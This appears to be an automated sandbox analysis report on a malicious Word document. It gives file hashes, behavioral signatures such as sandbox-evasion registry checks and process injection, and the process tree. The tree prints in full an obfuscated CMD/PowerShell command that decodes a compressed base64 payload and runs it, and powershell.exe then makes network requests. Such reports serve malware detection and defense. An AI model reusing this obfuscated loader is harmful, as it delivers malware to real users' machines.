Analysis
-
max time kernel
141s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
12-05-2024 02:14
Behavioral task
behavioral1
Sample
37b81642b0e432f46480033814f85b6a_JaffaCakes118.doc
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
37b81642b0e432f46480033814f85b6a_JaffaCakes118.doc
Resource
win10v2004-20240226-en
General
-
Target
37b81642b0e432f46480033814f85b6a_JaffaCakes118.doc
-
Size
76KB
-
MD5
37b81642b0e432f46480033814f85b6a
-
SHA1
3de2f1dc9cd31bcb680f7d9ae43169d7f851672b
-
SHA256
1aa38e81fe2944358f41c7afa56a4aacbdf1bc6933951219a168f49b3f64c498
-
SHA512
1b9a2cf4ceddb5b114ce49cdf1c756eebafc04c1f87cbf30b74b3ac779babbdf71314ed26a80af29bc3c5bafeb7e35d4ac422dd1b8114c2051d5d2832a95d366
-
SSDEEP
768:aDVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9YXxrHZPn6ff9dRUy:aDocn1kp59gxBK85fBt+a9YhlncjR
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 5484 4620 CMD.exe 90 -
Blocklisted process makes network request 5 IoCs
flow pid Process 36 1584 powershell.exe 37 1584 powershell.exe 64 1584 powershell.exe 66 1584 powershell.exe 70 1584 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 4620 WINWORD.EXE 4620 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1584 powershell.exe 1584 powershell.exe 1584 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1584 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 4620 WINWORD.EXE 4620 WINWORD.EXE 4620 WINWORD.EXE 4620 WINWORD.EXE 4620 WINWORD.EXE 4620 WINWORD.EXE 4620 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4620 wrote to memory of 5484 4620 WINWORD.EXE 98 PID 4620 wrote to memory of 5484 4620 WINWORD.EXE 98 PID 5484 wrote to memory of 1584 5484 CMD.exe 100 PID 5484 wrote to memory of 1584 5484 CMD.exe 100
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\37b81642b0e432f46480033814f85b6a_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Windows\SYSTEM32\CMD.exeCMD c:\wIndows\sYSteM32\CmD /C "sET djCFB= ( New-ObJecT sysTEm.io.comPREssIoN.dEfLATEStREaM( [iO.MemOrYSTReAm][COnVErt]::fromBASe64STRInG('NZBda8IwFED/Sh8CUZzpw9SpoaDo3MThx2QMx15qvFvSpklJUmMV//tama/3nHvgXrRMNpEC39b7BJgLluDIJ+wnUoByFJ3P7xHmzuXDMLSuyEGJNLPEFOF0N/kY/652q9E/9t4TXqgUJJhaeO68dcZldjrcBVutm1zkUNPuygzmvfGdcQmWF86BsUTJ0MvHDbPJ11rcBaPLWFpghRGuFIoRprNw0X9Si+1ggck2l8I18Ag3KTrydRAFuNftYIqSFx8hUMehgyxv4W/cqnkLEzgBpj/aQMx4A73OkkCooL63eXGmvKDqL2SqvZI6PsyEhJvzENTBJp2ro06hPa+itwndV52UXlnsGL9cr38=') ,[SysTeM.IO.COmprEsSion.comprEssIoNmodE]::DecOMPresS)^|ForEaCh {New-ObJecT iO.sTReamReADeR($_, [SYstEM.TEXT.EncoDING]::AScII) }^| FoReACh{$_.REaDToEND() } )^| ^&( $eNV:comSpeC[4,24,25]-JOIN'')&& powERsHEll ( ^& ( \"{1}{0}\"-f 'TeM','i') ( \"{0}{1}{2}\" -f 'ENv:dj','c','Fb' ) ).\"va`LUe\" ^| .(( ^& ( 'gv') (\"{0}{1}\" -f'*Md','r*' ) ).\"N`AMe\"[3,11,2]-joIn'' )"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:5484 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowERsHEll ( & ( \"{1}{0}\"-f 'TeM','i') ( \"{0}{1}{2}\" -f 'ENv:dj','c','Fb' ) ).\"va`LUe\" | .(( & ( 'gv') (\"{0}{1}\" -f'*Md','r*' ) ).\"N`AMe\"[3,11,2]-joIn'' )3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5136 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:81⤵PID:2036
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16KB
MD5262e973d8ea75e48ea2e1d9d0ff5d052
SHA1efe1871ddff26141415eef3b81e8c0c273ce0a0a
SHA2561071629ba60d33c8d55d8ae35540ccfa9d3373e377034f3ffdda7873d02d74a0
SHA5127c94c22b8fb936d620a48b9b64b1fbbb1e87800d9eccd7367b51e7db4f6fd8462d7b11bfaae10d28422b9d2e235ab09c1cf68c7289c7a4083230f7f3f099cb2a
-
Filesize
114B
MD5e89f75f918dbdcee28604d4e09dd71d7
SHA1f9d9055e9878723a12063b47d4a1a5f58c3eb1e9
SHA2566dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023
SHA5128df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82